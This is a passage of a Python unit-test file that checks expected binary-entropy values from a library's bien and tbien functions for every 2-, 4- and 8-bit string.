self.assertAlmostEqual(cpl.bien('00100011'), 0.9349560240267725)
self.assertAlmostEqual(cpl.bien('00100100'), 0.4536677888314028)
self.assertAlmostEqual(cpl.bien('00100101'), 0.9512928864313808)
self.assertAlmostEqual(cpl.bien('00100110'), 0.9421929243961734)
self.assertAlmostEqual(cpl.bien('00100111'), 0.23945861703877014)
self.assertAlmostEqual(cpl.bien('00101000'), 0.23797261801876332)
self.assertAlmostEqual(cpl.bien('00101001'), 0.9512928864313808)
self.assertAlmostEqual(cpl.bien('00101010'), 0.920308745565919)
self.assertAlmostEqual(cpl.bien('00101011'), 0.468917290698679)
self.assertAlmostEqual(cpl.bien('00101100'), 0.9506424806924296)
self.assertAlmostEqual(cpl.bien('00101101'), 0.1141247708092174)
self.assertAlmostEqual(cpl.bien('00101110'), 0.45772714740874854)
self.assertAlmostEqual(cpl.bien('00101111'), 0.9506424806924296)
self.assertAlmostEqual(cpl.bien('00110000'), 0.45174483501301504)
self.assertAlmostEqual(cpl.bien('00110001'), 0.9421929243961734)
self.assertAlmostEqual(cpl.bien('00110010'), 0.9265064677305163)
self.assertAlmostEqual(cpl.bien('00110011'), 0.023389419465106323)
self.assertAlmostEqual(cpl.bien('00110100'), 0.9506424806924296)
self.assertAlmostEqual(cpl.bien('00110101'), 0.4558041935903608)
self.assertAlmostEqual(cpl.bien('00110110'), 0.2310090607425139)
self.assertAlmostEqual(cpl.bien('00110111'), 0.9506424806924296)
self.assertAlmostEqual(cpl.bien('00111000'), 0.9487195268740418)
self.assertAlmostEqual(cpl.bien('00111001'), 0.2310090607425139)
self.assertAlmostEqual(cpl.bien('00111010'), 0.47341360407440564)
self.assertAlmostEqual(cpl.bien('00111011'), 0.9349560240267725)
self.assertAlmostEqual(cpl.bien('00111100'), 0.1115514112518785)
self.assertAlmostEqual(cpl.bien('00111101'), 0.9532158402497685)
self.assertAlmostEqual(cpl.bien('00111110'), 0.9512928864313808)
self.assertAlmostEqual(cpl.bien('00111111'), 0.44747006666680555)
self.assertAlmostEqual(cpl.bien('01000000'), 0.9370347771941213)
self.assertAlmostEqual(cpl.bien('01000001'), 0.23797261801876332)
self.assertAlmostEqual(cpl.bien('01000010'), 0.4536677888314028)
self.assertAlmostEqual(cpl.bien('01000011'), 0.9532158402497685)
self.assertAlmostEqual(cpl.bien('01000100'), 0.053399483437225476)
self.assertAlmostEqual(cpl.bien('01000101'), 0.9330330702083848)
self.assertAlmostEqual(cpl.bien('01000110'), 0.9506424806924296)
self.assertAlmostEqual(cpl.bien('01000111'), 0.45772714740874854)
self.assertAlmostEqual(cpl.bien('01001000'), 0.4562411483887417)
self.assertAlmostEqual(cpl.bien('01001001'), 0.9487195268740418)
self.assertAlmostEqual(cpl.bien('01001010'), 0.9444447585278324)
self.assertAlmostEqual(cpl.bien('01001011'), 0.1141247708092174)
self.assertAlmostEqual(cpl.bien('01001100'), 0.9265064677305163)
self.assertAlmostEqual(cpl.bien('01001101'), 0.468917290698679)
self.assertAlmostEqual(cpl.bien('01001110'), 0.23945861703877014)
self.assertAlmostEqual(cpl.bien('01001111'), 0.9532158402497685)
self.assertAlmostEqual(cpl.bien('01010000'), 0.22952306172250708)
self.assertAlmostEqual(cpl.bien('01010001'), 0.9487195268740418)
self.assertAlmostEqual(cpl.bien('01010010'), 0.9444447585278324)
self.assertAlmostEqual(cpl.bien('01010011'), 0.4558041935903608)
self.assertAlmostEqual(cpl.bien('01010100'), 0.920308745565919)
self.assertAlmostEqual(cpl.bien('01010101'), 0.007874015748031496)
self.assertAlmostEqual(cpl.bien('01010110'), 0.4489560656868124)
self.assertAlmostEqual(cpl.bien('01010111'), 0.9402699705777856)
self.assertAlmostEqual(cpl.bien('01011000'), 0.9532158402497685)
self.assertAlmostEqual(cpl.bien('01011001'), 0.4532308340330219)
self.assertAlmostEqual(cpl.bien('01011010'), 0.10727664290566899)
self.assertAlmostEqual(cpl.bien('01011011'), 0.9512928864313808)
self.assertAlmostEqual(cpl.bien('01011100'), 0.47341360407440564)
self.assertAlmostEqual(cpl.bien('01011101'), 0.9330330702083848)
self.assertAlmostEqual(cpl.bien('01011110'), 0.9506424806924296)
self.assertAlmostEqual(cpl.bien('01011111'), 0.22952306172250708)
self.assertAlmostEqual(cpl.bien('01100000'), 0.454318194570354)
self.assertAlmostEqual(cpl.bien('01100001'), 0.9506424806924296)
self.assertAlmostEqual(cpl.bien('01100010'), 0.9506424806924296)
self.assertAlmostEqual(cpl.bien('01100011'), 0.2310090607425139)
self.assertAlmostEqual(cpl.bien('01100100'), 0.9421929243961734)
self.assertAlmostEqual(cpl.bien('01100101'), 0.4532308340330219)
self.assertAlmostEqual(cpl.bien('01100110'), 0.023389419465106323)
self.assertAlmostEqual(cpl.bien('01100111'), 0.9265064677305163)
self.assertAlmostEqual(cpl.bien('01101000'), 0.9532158402497685)
self.assertAlmostEqual(cpl.bien('01101001'), 0.1115514112518785)
self.assertAlmostEqual(cpl.bien('01101010'), 0.4489560656868124)
self.assertAlmostEqual(cpl.bien('01101011'), 0.9512928864313808)
self.assertAlmostEqual(cpl.bien('01101100'), 0.2310090607425139)
self.assertAlmostEqual(cpl.bien('01101101'), 0.9487195268740418)
self.assertAlmostEqual(cpl.bien('01101110'), 0.9349560240267725)
self.assertAlmostEqual(cpl.bien('01101111'), 0.4719276050543988)
self.assertAlmostEqual(cpl.bien('01110000'), 0.9512928864313808)
self.assertAlmostEqual(cpl.bien('01110001'), 0.45515378785140964)
self.assertAlmostEqual(cpl.bien('01110010'), 0.23945861703877014)
self.assertAlmostEqual(cpl.bien('01110011'), 0.9421929243961734)
self.assertAlmostEqual(cpl.bien('01110100'), 0.45772714740874854)
self.assertAlmostEqual(cpl.bien('01110101'), 0.9487195268740418)
self.assertAlmostEqual(cpl.bien('01110110'), 0.9349560240267725)
self.assertAlmostEqual(cpl.bien('01110111'), 0.053399483437225476)
self.assertAlmostEqual(cpl.bien('01111000'), 0.1141247708092174)
self.assertAlmostEqual(cpl.bien('01111001'), 0.9506424806924296)
self.assertAlmostEqual(cpl.bien('01111010'), 0.9506424806924296)
self.assertAlmostEqual(cpl.bien('01111011'), 0.4562411483887417)
self.assertAlmostEqual(cpl.bien('01111100'), 0.9512928864313808)
self.assertAlmostEqual(cpl.bien('01111101'), 0.23797261801876332)
self.assertAlmostEqual(cpl.bien('01111110'), 0.46743129167867215)
self.assertAlmostEqual(cpl.bien('01111111'), 0.9170735521822547)
self.assertAlmostEqual(cpl.bien('10000000'), 0.9170735521822547)
self.assertAlmostEqual(cpl.bien('10000001'), 0.46743129167867215)
self.assertAlmostEqual(cpl.bien('10000010'), 0.23797261801876332)
self.assertAlmostEqual(cpl.bien('10000011'), 0.9512928864313808)
self.assertAlmostEqual(cpl.bien('10000100'), 0.4562411483887417)
self.assertAlmostEqual(cpl.bien('10000101'), 0.9506424806924296)
self.assertAlmostEqual(cpl.bien('10000110'), 0.9506424806924296)
self.assertAlmostEqual(cpl.bien('10000111'), 0.1141247708092174)
self.assertAlmostEqual(cpl.bien('10001000'), 0.053399483437225476)
self.assertAlmostEqual(cpl.bien('10001001'), 0.9349560240267725)
self.assertAlmostEqual(cpl.bien('10001010'), 0.9487195268740418)
self.assertAlmostEqual(cpl.bien('10001011'), 0.45772714740874854)
self.assertAlmostEqual(cpl.bien('10001100'), 0.9421929243961734)
self.assertAlmostEqual(cpl.bien('10001101'), 0.23945861703877014)
self.assertAlmostEqual(cpl.bien('10001110'), 0.45515378785140964)
self.assertAlmostEqual(cpl.bien('10001111'), 0.9512928864313808)
self.assertAlmostEqual(cpl.bien('10010000'), 0.4719276050543988)
self.assertAlmostEqual(cpl.bien('10010001'), 0.9349560240267725)
self.assertAlmostEqual(cpl.bien('10010010'), 0.9487195268740418)
self.assertAlmostEqual(cpl.bien('10010011'), 0.2310090607425139)
self.assertAlmostEqual(cpl.bien('10010100'), 0.9512928864313808)
self.assertAlmostEqual(cpl.bien('10010101'), 0.4489560656868124)
self.assertAlmostEqual(cpl.bien('10010110'), 0.1115514112518785)
self.assertAlmostEqual(cpl.bien('10010111'), 0.9532158402497685)
self.assertAlmostEqual(cpl.bien('10011000'), 0.9265064677305163)
self.assertAlmostEqual(cpl.bien('10011001'), 0.023389419465106323)
self.assertAlmostEqual(cpl.bien('10011010'), 0.4532308340330219)
self.assertAlmostEqual(cpl.bien('10011011'), 0.9421929243961734)
self.assertAlmostEqual(cpl.bien('10011100'), 0.2310090607425139)
self.assertAlmostEqual(cpl.bien('10011101'), 0.9506424806924296)
self.assertAlmostEqual(cpl.bien('10011110'), 0.9506424806924296)
self.assertAlmostEqual(cpl.bien('10011111'), 0.454318194570354)
self.assertAlmostEqual(cpl.bien('10100000'), 0.22952306172250708)
self.assertAlmostEqual(cpl.bien('10100001'), 0.9506424806924296)
self.assertAlmostEqual(cpl.bien('10100010'), 0.9330330702083848)
self.assertAlmostEqual(cpl.bien('10100011'), 0.47341360407440564)
self.assertAlmostEqual(cpl.bien('10100100'), 0.9512928864313808)
self.assertAlmostEqual(cpl.bien('10100101'), 0.10727664290566899)
self.assertAlmostEqual(cpl.bien('10100110'), 0.4532308340330219)
self.assertAlmostEqual(cpl.bien('10100111'), 0.9532158402497685)
self.assertAlmostEqual(cpl.bien('10101000'), 0.9402699705777856)
self.assertAlmostEqual(cpl.bien('10101001'), 0.4489560656868124)
self.assertAlmostEqual(cpl.bien('10101010'), 0.007874015748031496)
self.assertAlmostEqual(cpl.bien('10101011'), 0.920308745565919)
self.assertAlmostEqual(cpl.bien('10101100'), 0.4558041935903608)
self.assertAlmostEqual(cpl.bien('10101101'), 0.9444447585278324)
self.assertAlmostEqual(cpl.bien('10101110'), 0.9487195268740418)
self.assertAlmostEqual(cpl.bien('10101111'), 0.22952306172250708)
self.assertAlmostEqual(cpl.bien('10110000'), 0.9532158402497685)
self.assertAlmostEqual(cpl.bien('10110001'), 0.23945861703877014)
self.assertAlmostEqual(cpl.bien('10110010'), 0.468917290698679)
self.assertAlmostEqual(cpl.bien('10110011'), 0.9265064677305163)
self.assertAlmostEqual(cpl.bien('10110100'), 0.1141247708092174)
self.assertAlmostEqual(cpl.bien('10110101'), 0.9444447585278324)
self.assertAlmostEqual(cpl.bien('10110110'), 0.9487195268740418)
self.assertAlmostEqual(cpl.bien('10110111'), 0.4562411483887417)
self.assertAlmostEqual(cpl.bien('10111000'), 0.45772714740874854)
self.assertAlmostEqual(cpl.bien('10111001'), 0.9506424806924296)
self.assertAlmostEqual(cpl.bien('10111010'), 0.9330330702083848)
self.assertAlmostEqual(cpl.bien('10111011'), 0.053399483437225476)
self.assertAlmostEqual(cpl.bien('10111100'), 0.9532158402497685)
self.assertAlmostEqual(cpl.bien('10111101'), 0.4536677888314028)
self.assertAlmostEqual(cpl.bien('10111110'), 0.23797261801876332)
self.assertAlmostEqual(cpl.bien('10111111'), 0.9370347771941213)
self.assertAlmostEqual(cpl.bien('11000000'), 0.44747006666680555)
self.assertAlmostEqual(cpl.bien('11000001'), 0.9512928864313808)
self.assertAlmostEqual(cpl.bien('11000010'), 0.9532158402497685)
self.assertAlmostEqual(cpl.bien('11000011'), 0.1115514112518785)
self.assertAlmostEqual(cpl.bien('11000100'), 0.9349560240267725)
self.assertAlmostEqual(cpl.bien('11000101'), 0.47341360407440564)
self.assertAlmostEqual(cpl.bien('11000110'), 0.2310090607425139)
self.assertAlmostEqual(cpl.bien('11000111'), 0.9487195268740418)
self.assertAlmostEqual(cpl.bien('11001000'), 0.9506424806924296)
self.assertAlmostEqual(cpl.bien('11001001'), 0.2310090607425139)
self.assertAlmostEqual(cpl.bien('11001010'), 0.4558041935903608)
self.assertAlmostEqual(cpl.bien('11001011'), 0.9506424806924296)
self.assertAlmostEqual(cpl.bien('11001100'), 0.023389419465106323)
self.assertAlmostEqual(cpl.bien('11001101'), 0.9265064677305163)
self.assertAlmostEqual(cpl.bien('11001110'), 0.9421929243961734)
self.assertAlmostEqual(cpl.bien('11001111'), 0.45174483501301504)
self.assertAlmostEqual(cpl.bien('11010000'), 0.9506424806924296)
self.assertAlmostEqual(cpl.bien('11010001'), 0.45772714740874854)
self.assertAlmostEqual(cpl.bien('11010010'), 0.1141247708092174)
self.assertAlmostEqual(cpl.bien('11010011'), 0.9506424806924296)
self.assertAlmostEqual(cpl.bien('11010100'), 0.468917290698679)
self.assertAlmostEqual(cpl.bien('11010101'), 0.920308745565919)
self.assertAlmostEqual(cpl.bien('11010110'), 0.9512928864313808)
self.assertAlmostEqual(cpl.bien('11010111'), 0.23797261801876332)
self.assertAlmostEqual(cpl.bien('11011000'), 0.23945861703877014)
self.assertAlmostEqual(cpl.bien('11011001'), 0.9421929243961734)
self.assertAlmostEqual(cpl.bien('11011010'), 0.9512928864313808)
self.assertAlmostEqual(cpl.bien('11011011'), 0.4536677888314028)
self.assertAlmostEqual(cpl.bien('11011100'), 0.9349560240267725)
self.assertAlmostEqual(cpl.bien('11011101'), 0.053399483437225476)
self.assertAlmostEqual(cpl.bien('11011110'), 0.4562411483887417)
self.assertAlmostEqual(cpl.bien('11011111'), 0.9454843334903775)
self.assertAlmostEqual(cpl.bien('11100000'), 0.9444447585278324)
self.assertAlmostEqual(cpl.bien('11100001'), 0.1141247708092174)
self.assertAlmostEqual(cpl.bien('11100010'), 0.45772714740874854)
self.assertAlmostEqual(cpl.bien('11100011'), 0.9487195268740418)
self.assertAlmostEqual(cpl.bien('11100100'), 0.23945861703877014)
self.assertAlmostEqual(cpl.bien('11100101'), 0.9532158402497685)
self.assertAlmostEqual(cpl.bien('11100110'), 0.9265064677305163)
self.assertAlmostEqual(cpl.bien('11100111'), 0.46743129167867215)
self.assertAlmostEqual(cpl.bien('11101000'), 0.45515378785140964)
self.assertAlmostEqual(cpl.bien('11101001'), 0.9532158402497685)
self.assertAlmostEqual(cpl.bien('11101010'), 0.9402699705777856)
self.assertAlmostEqual(cpl.bien('11101011'), 0.23797261801876332)
self.assertAlmostEqual(cpl.bien('11101100'), 0.9506424806924296)
self.assertAlmostEqual(cpl.bien('11101101'), 0.4562411483887417)
self.assertAlmostEqual(cpl.bien('11101110'), 0.053399483437225476)
self.assertAlmostEqual(cpl.bien('11101111'), 0.9297978768247205)
self.assertAlmostEqual(cpl.bien('11110000'), 0.10727664290566898)
self.assertAlmostEqual(cpl.bien('11110001'), 0.9512928864313808)
self.assertAlmostEqual(cpl.bien('11110010'), 0.9532158402497685)
self.assertAlmostEqual(cpl.bien('11110011'), 0.45174483501301504)
self.assertAlmostEqual(cpl.bien('11110100'), 0.9506424806924296)
self.assertAlmostEqual(cpl.bien('11110101'), 0.22952306172250708)
self.assertAlmostEqual(cpl.bien('11110110'), 0.4719276050543988)
self.assertAlmostEqual(cpl.bien('11110111'), 0.9297978768247205)
self.assertAlmostEqual(cpl.bien('11111000'), 0.9444447585278324)
self.assertAlmostEqual(cpl.bien('11111001'), 0.454318194570354)
self.assertAlmostEqual(cpl.bien('11111010'), 0.22952306172250708)
self.assertAlmostEqual(cpl.bien('11111011'), 0.9454843334903775)
self.assertAlmostEqual(cpl.bien('11111100'), 0.44747006666680555)
self.assertAlmostEqual(cpl.bien('11111101'), 0.9370347771941213)
self.assertAlmostEqual(cpl.bien('11111110'), 0.9170735521822547)
self.assertAlmostEqual(cpl.bien('11111111'), 0.0)
def test_tbien(self):
# 2-bit strings
self.assertEqual(cpl.tbien('00'), 0.0)
self.assertEqual(cpl.tbien('01'), 1.0)
self.assertEqual(cpl.tbien('10'), 1.0)
self.assertEqual(cpl.tbien('11'), 0.0)
# 4-bit strings, asserts equality to 7 decimal places
self.assertAlmostEqual(cpl.tbien('0000'), 0.0)
self.assertAlmostEqual(cpl.tbien('0001'), 0.9305948708049089)
self.assertAlmostEqual(cpl.tbien('0010'), 0.9305948708049089)
self.assertAlmostEqual(cpl.tbien('0011'), 0.5355473378808682)
self.assertAlmostEqual(cpl.tbien('0100'), 0.9305948708049089)
self.assertAlmostEqual(cpl.tbien('0101'), 0.21810429198553155)
self.assertAlmostEqual(cpl.tbien('0110'), 0.5355473378808682)
self.assertAlmostEqual(cpl.tbien('0111'), 0.9305948708049089)
self.assertAlmostEqual(cpl.tbien('1000'), 0.9305948708049089)
self.assertAlmostEqual(cpl.tbien('1001'), 0.5355473378808682)
self.assertAlmostEqual(cpl.tbien('1010'), 0.21810429198553155)
self.assertAlmostEqual(cpl.tbien('1011'), 0.9305948708049089)
self.assertAlmostEqual(cpl.tbien('1100'), 0.5355473378808682)
self.assertAlmostEqual(cpl.tbien('1101'), 0.9305948708049089)
self.assertAlmostEqual(cpl.tbien('1110'), 0.9305948708049089)
self.assertAlmostEqual(cpl.tbien('1111'), 0.0)
# 8-bit strings, asserts equality to 7 decimal places
self.assertAlmostEqual(cpl.tbien('00000000'), 0.0)
self.assertAlmostEqual(cpl.tbien('00000001'), 0.7930318630672043)
self.assertAlmostEqual(cpl.tbien('00000010'), 0.8589468375430831)
self.assertAlmostEqual(cpl.tbien('00000011'), 0.6813985994017482)
self.assertAlmostEqual(cpl.tbien('00000100'), 0.8940170728237214)
self.assertAlmostEqual(cpl.tbien('00000101'), 0.5563891001761716)
self.assertAlmostEqual(cpl.tbien('00000110'), 0.7202007974767275)
self.assertAlmostEqual(cpl.tbien('00000111'), 0.8927513204867304)
self.assertAlmostEqual(cpl.tbien('00001000'), 0.8562234604151914)
self.assertAlmostEqual(cpl.tbien('00001001'), 0.7706444709379511)
self.assertAlmostEqual(cpl.tbien('00001010'), 0.5563891001761716)
self.assertAlmostEqual(cpl.tbien('00001011'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('00001100'), 0.7095199614690969)
self.assertAlmostEqual(cpl.tbien('00001101'), 0.9442035796144033)
self.assertAlmostEqual(cpl.tbien('00001110'), 0.9315535185617098)
self.assertAlmostEqual(cpl.tbien('00001111'), 0.3940627705450895)
self.assertAlmostEqual(cpl.tbien('00010000'), 0.8562234604151914)
self.assertAlmostEqual(cpl.tbien('00010001'), 0.28582053198265955)
self.assertAlmostEqual(cpl.tbien('00010010'), 0.732850858529421)
self.assertAlmostEqual(cpl.tbien('00010011'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('00010100'), 0.59145933545681)
self.assertAlmostEqual(cpl.tbien('00010101'), 0.8858024472734408)
self.assertAlmostEqual(cpl.tbien('00010110'), 0.9442035796144033)
self.assertAlmostEqual(cpl.tbien('00010111'), 0.7345054241526495)
self.assertAlmostEqual(cpl.tbien('00011000'), 0.747313573877627)
self.assertAlmostEqual(cpl.tbien('00011001'), 0.8606588959176042)
self.assertAlmostEqual(cpl.tbien('00011010'), 0.9442035796144033)
self.assertAlmostEqual(cpl.tbien('00011011'), 0.6037947370876691)
self.assertAlmostEqual(cpl.tbien('00011100'), 0.9208726825540792)
self.assertAlmostEqual(cpl.tbien('00011101'), 0.7451862601602801)
self.assertAlmostEqual(cpl.tbien('00011110'), 0.43286496862006874)
self.assertAlmostEqual(cpl.tbien('00011111'), 0.8927513204867304)
self.assertAlmostEqual(cpl.tbien('00100000'), 0.8940170728237214)
self.assertAlmostEqual(cpl.tbien('00100001'), 0.732850858529421)
self.assertAlmostEqual(cpl.tbien('00100010'), 0.28582053198265955)
self.assertAlmostEqual(cpl.tbien('00100011'), 0.8957291311982426)
self.assertAlmostEqual(cpl.tbien('00100100'), 0.7221700225217904)
self.assertAlmostEqual(cpl.tbien('00100101'), 0.9315535185617098)
self.assertAlmostEqual(cpl.tbien('00100110'), 0.8984525083261343)
self.assertAlmostEqual(cpl.tbien('00100111'), 0.6037947370876691)
self.assertAlmostEqual(cpl.tbien('00101000'), 0.59145933545681)
self.assertAlmostEqual(cpl.tbien('00101001'), 0.9315535185617098)
self.assertAlmostEqual(cpl.tbien('00101010'), 0.819887472797562)
self.assertAlmostEqual(cpl.tbien('00101011'), 0.7596489755084861)
self.assertAlmostEqual(cpl.tbien('00101100'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('00101101'), 0.43286496862006874)
self.assertAlmostEqual(cpl.tbien('00101110'), 0.7451862601602801)
self.assertAlmostEqual(cpl.tbien('00101111'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('00110000'), 0.7095199614690969)
self.assertAlmostEqual(cpl.tbien('00110001'), 0.8984525083261343)
self.assertAlmostEqual(cpl.tbien('00110010'), 0.8606588959176042)
self.assertAlmostEqual(cpl.tbien('00110011'), 0.1674302125437542)
self.assertAlmostEqual(cpl.tbien('00110100'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('00110101'), 0.7325361991075866)
self.assertAlmostEqual(cpl.tbien('00110110'), 0.5687245018070307)
self.assertAlmostEqual(cpl.tbien('00110111'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('00111000'), 0.9208726825540792)
self.assertAlmostEqual(cpl.tbien('00111001'), 0.5687245018070307)
self.assertAlmostEqual(cpl.tbien('00111010'), 0.7829798725688102)
self.assertAlmostEqual(cpl.tbien('00111011'), 0.8957291311982426)
self.assertAlmostEqual(cpl.tbien('00111100'), 0.4221841326124382)
self.assertAlmostEqual(cpl.tbien('00111101'), 0.9442035796144033)
self.assertAlmostEqual(cpl.tbien('00111110'), 0.9315535185617098)
self.assertAlmostEqual(cpl.tbien('00111111'), 0.6813985994017482)
self.assertAlmostEqual(cpl.tbien('01000000'), 0.8589468375430831)
self.assertAlmostEqual(cpl.tbien('01000001'), 0.59145933545681)
self.assertAlmostEqual(cpl.tbien('01000010'), 0.7221700225217904)
self.assertAlmostEqual(cpl.tbien('01000011'), 0.9442035796144033)
self.assertAlmostEqual(cpl.tbien('01000100'), 0.28582053198265955)
self.assertAlmostEqual(cpl.tbien('01000101'), 0.8830790701455491)
self.assertAlmostEqual(cpl.tbien('01000110'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('01000111'), 0.7451862601602801)
self.assertAlmostEqual(cpl.tbien('01001000'), 0.732850858529421)
self.assertAlmostEqual(cpl.tbien('01001001'), 0.9208726825540792)
self.assertAlmostEqual(cpl.tbien('01001010'), 0.8927513204867304)
self.assertAlmostEqual(cpl.tbien('01001011'), 0.43286496862006874)
self.assertAlmostEqual(cpl.tbien('01001100'), 0.8606588959176042)
self.assertAlmostEqual(cpl.tbien('01001101'), 0.7596489755084861)
self.assertAlmostEqual(cpl.tbien('01001110'), 0.6037947370876691)
self.assertAlmostEqual(cpl.tbien('01001111'), 0.9442035796144033)
self.assertAlmostEqual(cpl.tbien('01010000'), 0.5563891001761716)
self.assertAlmostEqual(cpl.tbien('01010001'), 0.9208726825540792)
self.assertAlmostEqual(cpl.tbien('01010010'), 0.8927513204867304)
self.assertAlmostEqual(cpl.tbien('01010011'), 0.7325361991075866)
self.assertAlmostEqual(cpl.tbien('01010100'), 0.819887472797562)
self.assertAlmostEqual(cpl.tbien('01010101'), 0.06536286053488224)
self.assertAlmostEqual(cpl.tbien('01010110'), 0.6937340010326074)
self.assertAlmostEqual(cpl.tbien('01010111'), 0.8858024472734408)
self.assertAlmostEqual(cpl.tbien('01011000'), 0.9442035796144033)
self.assertAlmostEqual(cpl.tbien('01011001'), 0.721855363099956)
self.assertAlmostEqual(cpl.tbien('01011010'), 0.39406277054508954)
self.assertAlmostEqual(cpl.tbien('01011011'), 0.9315535185617098)
self.assertAlmostEqual(cpl.tbien('01011100'), 0.7829798725688102)
self.assertAlmostEqual(cpl.tbien('01011101'), 0.8830790701455491)
self.assertAlmostEqual(cpl.tbien('01011110'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('01011111'), 0.5563891001761716)
self.assertAlmostEqual(cpl.tbien('01100000'), 0.7202007974767275)
self.assertAlmostEqual(cpl.tbien('01100001'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('01100010'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('01100011'), 0.5687245018070307)
self.assertAlmostEqual(cpl.tbien('01100100'), 0.8984525083261343)
self.assertAlmostEqual(cpl.tbien('01100101'), 0.721855363099956)
self.assertAlmostEqual(cpl.tbien('01100110'), 0.1674302125437542)
self.assertAlmostEqual(cpl.tbien('01100111'), 0.8606588959176042)
self.assertAlmostEqual(cpl.tbien('01101000'), 0.9442035796144033)
self.assertAlmostEqual(cpl.tbien('01101001'), 0.4221841326124382)
self.assertAlmostEqual(cpl.tbien('01101010'), 0.6937340010326074)
self.assertAlmostEqual(cpl.tbien('01101011'), 0.9315535185617098)
self.assertAlmostEqual(cpl.tbien('01101100'), 0.5687245018070307)
self.assertAlmostEqual(cpl.tbien('01101101'), 0.9208726825540792)
self.assertAlmostEqual(cpl.tbien('01101110'), 0.8957291311982426)
self.assertAlmostEqual(cpl.tbien('01101111'), 0.7706444709379511)
self.assertAlmostEqual(cpl.tbien('01110000'), 0.9315535185617098)
self.assertAlmostEqual(cpl.tbien('01110001'), 0.7345054241526495)
self.assertAlmostEqual(cpl.tbien('01110010'), 0.6037947370876691)
self.assertAlmostEqual(cpl.tbien('01110011'), 0.8984525083261343)
self.assertAlmostEqual(cpl.tbien('01110100'), 0.7451862601602801)
self.assertAlmostEqual(cpl.tbien('01110101'), 0.9208726825540792)
self.assertAlmostEqual(cpl.tbien('01110110'), 0.8957291311982426)
self.assertAlmostEqual(cpl.tbien('01110111'), 0.28582053198265955)
self.assertAlmostEqual(cpl.tbien('01111000'), 0.43286496862006874)
self.assertAlmostEqual(cpl.tbien('01111001'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('01111010'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('01111011'), 0.732850858529421)
self.assertAlmostEqual(cpl.tbien('01111100'), 0.9315535185617098)
self.assertAlmostEqual(cpl.tbien('01111101'), 0.59145933545681)
self.assertAlmostEqual(cpl.tbien('01111110'), 0.747313573877627)
self.assertAlmostEqual(cpl.tbien('01111111'), 0.7930318630672043)
self.assertAlmostEqual(cpl.tbien('10000000'), 0.7930318630672043)
self.assertAlmostEqual(cpl.tbien('10000001'), 0.747313573877627)
self.assertAlmostEqual(cpl.tbien('10000010'), 0.59145933545681)
self.assertAlmostEqual(cpl.tbien('10000011'), 0.9315535185617098)
self.assertAlmostEqual(cpl.tbien('10000100'), 0.732850858529421)
self.assertAlmostEqual(cpl.tbien('10000101'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('10000110'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('10000111'), 0.43286496862006874)
self.assertAlmostEqual(cpl.tbien('10001000'), 0.28582053198265955)
self.assertAlmostEqual(cpl.tbien('10001001'), 0.8957291311982426)
self.assertAlmostEqual(cpl.tbien('10001010'), 0.9208726825540792)
self.assertAlmostEqual(cpl.tbien('10001011'), 0.7451862601602801)
self.assertAlmostEqual(cpl.tbien('10001100'), 0.8984525083261343)
self.assertAlmostEqual(cpl.tbien('10001101'), 0.6037947370876691)
self.assertAlmostEqual(cpl.tbien('10001110'), 0.7345054241526495)
self.assertAlmostEqual(cpl.tbien('10001111'), 0.9315535185617098)
self.assertAlmostEqual(cpl.tbien('10010000'), 0.7706444709379511)
self.assertAlmostEqual(cpl.tbien('10010001'), 0.8957291311982426)
self.assertAlmostEqual(cpl.tbien('10010010'), 0.9208726825540792)
self.assertAlmostEqual(cpl.tbien('10010011'), 0.5687245018070307)
self.assertAlmostEqual(cpl.tbien('10010100'), 0.9315535185617098)
self.assertAlmostEqual(cpl.tbien('10010101'), 0.6937340010326074)
self.assertAlmostEqual(cpl.tbien('10010110'), 0.4221841326124382)
self.assertAlmostEqual(cpl.tbien('10010111'), 0.9442035796144033)
self.assertAlmostEqual(cpl.tbien('10011000'), 0.8606588959176042)
self.assertAlmostEqual(cpl.tbien('10011001'), 0.1674302125437542)
self.assertAlmostEqual(cpl.tbien('10011010'), 0.721855363099956)
self.assertAlmostEqual(cpl.tbien('10011011'), 0.8984525083261343)
self.assertAlmostEqual(cpl.tbien('10011100'), 0.5687245018070307)
self.assertAlmostEqual(cpl.tbien('10011101'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('10011110'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('10011111'), 0.7202007974767275)
self.assertAlmostEqual(cpl.tbien('10100000'), 0.5563891001761716)
self.assertAlmostEqual(cpl.tbien('10100001'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('10100010'), 0.8830790701455491)
self.assertAlmostEqual(cpl.tbien('10100011'), 0.7829798725688102)
self.assertAlmostEqual(cpl.tbien('10100100'), 0.9315535185617098)
self.assertAlmostEqual(cpl.tbien('10100101'), 0.39406277054508954)
self.assertAlmostEqual(cpl.tbien('10100110'), 0.721855363099956)
self.assertAlmostEqual(cpl.tbien('10100111'), 0.9442035796144033)
self.assertAlmostEqual(cpl.tbien('10101000'), 0.8858024472734408)
self.assertAlmostEqual(cpl.tbien('10101001'), 0.6937340010326074)
self.assertAlmostEqual(cpl.tbien('10101010'), 0.06536286053488224)
self.assertAlmostEqual(cpl.tbien('10101011'), 0.819887472797562)
self.assertAlmostEqual(cpl.tbien('10101100'), 0.7325361991075866)
self.assertAlmostEqual(cpl.tbien('10101101'), 0.8927513204867304)
self.assertAlmostEqual(cpl.tbien('10101110'), 0.9208726825540792)
self.assertAlmostEqual(cpl.tbien('10101111'), 0.5563891001761716)
self.assertAlmostEqual(cpl.tbien('10110000'), 0.9442035796144033)
self.assertAlmostEqual(cpl.tbien('10110001'), 0.6037947370876691)
self.assertAlmostEqual(cpl.tbien('10110010'), 0.7596489755084861)
self.assertAlmostEqual(cpl.tbien('10110011'), 0.8606588959176042)
self.assertAlmostEqual(cpl.tbien('10110100'), 0.43286496862006874)
self.assertAlmostEqual(cpl.tbien('10110101'), 0.8927513204867304)
self.assertAlmostEqual(cpl.tbien('10110110'), 0.9208726825540792)
